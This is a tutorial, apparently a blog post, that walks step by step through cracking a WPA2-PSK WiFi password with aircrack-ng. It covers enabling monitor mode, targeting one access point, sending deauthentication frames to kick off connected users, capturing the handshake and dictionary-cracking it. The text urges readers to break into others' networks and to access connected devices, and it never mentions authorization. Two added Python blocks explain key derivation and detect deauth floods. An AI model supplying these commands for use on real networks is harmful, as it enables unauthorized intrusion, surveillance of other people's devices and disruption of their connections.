Intro to Wireless Hacking
Wireless networking was rolled out for internet access in the 1990s with WEP (Wired Equivalent Privacy), but geniuses like you came up with a number of ways to crack it. So after a lot of grinding over the encryption problem, computer scientists, cybersecurity analysts and researchers came up with the concept of WPA2-PSK.
WPA2-PSK is WiFi Protected Access 2 with a pre-shared key for wireless security. WPA2 uses a stronger encryption algorithm, AES, which is very tough to crack, but geniuses like you love to tear apart every obstacle in their way, so who the hell is stopping you? We have the solution here; read it step by step and finish off this mountain too.
But yes, one has to be genuinely technical to get past this obstacle, because penetrating and getting access to someone's network isn't small stuff. Once you're in, you can tap, track, or access any of the devices connected to that network.
Basic Algorithm behind the hack
The weakness of a WPA2-PSK system is that an encrypted form of the password is embedded in the 4-way handshake. When a user authenticates to the access point (for kiddos: when you try to connect to a WiFi network), the user and the access point (AP) go through a password-matching session, or in technical language a four-step process, to authenticate the user to the access point. At that moment our machine, using a hardware tool we will discuss next, tries to recover the password by matching the captured handshake against our own list of words.
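As an added illustration (not from the original post) of what the handshake actually protects: both the client and the AP derive a pairwise master key (PMK) from the passphrase and the SSID with PBKDF2-HMAC-SHA1, as IEEE 802.11i specifies, and it is this derived key that the handshake proves knowledge of. The passphrase never crosses the air, which is why a wordlist attack has to repeat this derivation for every candidate word. The test vector below is the published 802.11i one; the second SSID is a constructed value.

```python
# Added example (not from the original post): the WPA2-PSK pairwise master
# key (PMK) derivation from IEEE 802.11i. Client and AP both compute it from
# the passphrase and the SSID; the passphrase itself is never transmitted.
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PMK_LENGTH_BYTES = 32      # 256-bit PMK


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK for an ASCII passphrase (8..63 chars) and an SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LENGTH_BYTES)


def pmk_hex(passphrase: str, ssid: str) -> str:
    """Hex form of the PMK, convenient for comparing against test vectors."""
    return wpa2_pmk(passphrase, ssid).hex()


if __name__ == "__main__":
    # Published 802.11i test vector: passphrase "password", SSID "IEEE".
    print(pmk_hex("password", "IEEE"))
    # The SSID acts as the salt: same passphrase on a different network gives a
    # different PMK, so precomputed tables only pay off against common SSIDs.
    # "homenet" is a constructed SSID used only for this comparison.
    print(pmk_hex("password", "IEEE") == pmk_hex("password", "homenet"))  # False
```

Each candidate costs 4096 HMAC-SHA1 rounds, which is the cost a defender buys by choosing a passphrase that is not in any wordlist.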
Step 1: Enabling monitor mode
First, we have to put the WiFi adapter (compatible ones: Leoxsys 150N, Alfa 150 Mbps (recommended) and Alfa 1900 (best)) into monitor mode. In simple words, we are putting our technical arm into the air through which all the wireless traffic is floating and passing by.
We can do this by opening a terminal and typing:
$ airmon-ng start wlan0
airmon-ng will rename our wlan0 adapter to wlan0mon, and that is the interface name the following commands use.
Step 2: Capturing wireless traffic
This step captures all the traffic in the air that passes our adapter. For this we use the airodump-ng command.
$ airodump-ng wlan0mon
This command collects all the critical information about the wireless traffic in the area, such as BSSID, number of beacon frames, power, channel, speed and encryption.
Step 3: Targeting the AP we want
In this step we target the access point we want and capture its critical data. For this we need the BSSID and the channel of the targeted access point (AP). Open another terminal and run the command below:
$ airodump-ng --bssid C4:9F:4C:F8:0F:7F -c 11 --write WPAcrack wlan0mon
C4:9F:4C:F8:0F:7F is the BSSID of the WiFi network
-c 11 is the channel of the AP we are working on
WPAcrack is the file prefix under which the captured traffic, including the handshake with the encrypted password, will be saved
wlan0mon is the name of our monitor-mode interface
In the above image (the airodump-ng output), we can see that it is now focusing only on the one AP whose password we want to crack.
Step 4: Using aireplay-ng for deauthentication
Now, to capture the encrypted password, we need a user to authenticate against the access point. If they are already authenticated, we can de-authenticate them; their device will automatically re-authenticate, and we grab the encrypted password in the process. For this, open another terminal and execute the command below:
$ aireplay-ng --deauth 100 -a C4:9F:4C:F8:0F:7F wlan0mon
100 is the number of de-authentication frames we are sending
C4:9F:4C:F8:0F:7F is the BSSID of the access point
wlan0mon is the name of our monitor-mode interface
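From the defender's side, the burst of deauthentication frames this step sends is exactly what a wireless IDS looks for. This added example (not from the original post) runs a simple sliding-window detector over a constructed frame log of the kind a monitor-mode capture yields; the threshold, window length and BSSIDs are assumed values, not taken from any real product or network.

```python
# Added example (not from the original post): a minimal deauth-flood detector
# as a wireless IDS would run it. Input is a constructed list of frame
# summaries (timestamp, subtype, bssid, destination). Threshold and window
# are assumed values. Note that 802.11w (Protected Management Frames)
# authenticates deauth frames, so clients with PMF ignore forged bursts.
from collections import defaultdict, deque

DEAUTH_THRESHOLD = 10   # assumed: more than this many deauths per window is a flood
WINDOW_SECONDS = 1.0    # assumed sliding-window length

# Constructed sample capture: one beacon, a 25-frame deauth burst against a
# single AP (locally administered, made-up BSSID), and one lone deauth that
# a client might legitimately send when leaving a network.
SAMPLE_FRAMES = (
    [(0.00, "beacon", "02:00:00:00:AA:01", "ff:ff:ff:ff:ff:ff")]
    + [(0.10 + i * 0.02, "deauth", "02:00:00:00:AA:01", "ff:ff:ff:ff:ff:ff")
       for i in range(25)]
    + [(0.30, "deauth", "02:00:00:00:BB:02", "02:00:00:00:CC:03")]
)


def detect_deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return {bssid: timestamp} for each BSSID whose deauth count inside any
    sliding window exceeds the threshold; the timestamp is the first alert."""
    recent = defaultdict(deque)   # per-BSSID timestamps of recent deauths
    alerts = {}
    for ts, subtype, bssid, _dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that left the window
            q.popleft()
        if len(q) > threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts


if __name__ == "__main__":
    for bssid, ts in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"deauth flood against {bssid} detected at t={ts:.2f}s")
```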
Step 5: Capturing the handshake
In the previous step we forced the user to disconnect from their WiFi network so they would reconnect; while the user's device reconnects to the AP, airodump-ng will attempt to grab the encrypted password. Go back to the airodump-ng terminal and you should see "WPA handshake" displayed there. This signals that we successfully captured the password in its encrypted form.
Step 6: Decrypting the encrypted password
Now we use our main weapon, aircrack-ng, to decrypt the encrypted password we grabbed from the re-authentication between the user and the AP. This process depends on how strong our dictionary file, or wordlist, is: in simple words, a list of candidate passwords. It is done by executing the command below:
$ aircrack-ng WPAcrack-02.cap -w rockyou.txt
WPAcrack-02.cap is the capture file airodump-ng wrote under the WPAcrack prefix (airodump-ng appends a sequence number, hence -02)
-w rockyou.txt is our file containing the list of passwords
From here it all depends on our system's processing speed, GPU, the WiFi adapter we are using and, most importantly, the password's length and the character types used in it. A password longer than 8 characters that mixes upper case, lower case, numbers and special symbols takes a lot of time. When the process finishes, a message appears on the terminal with the password.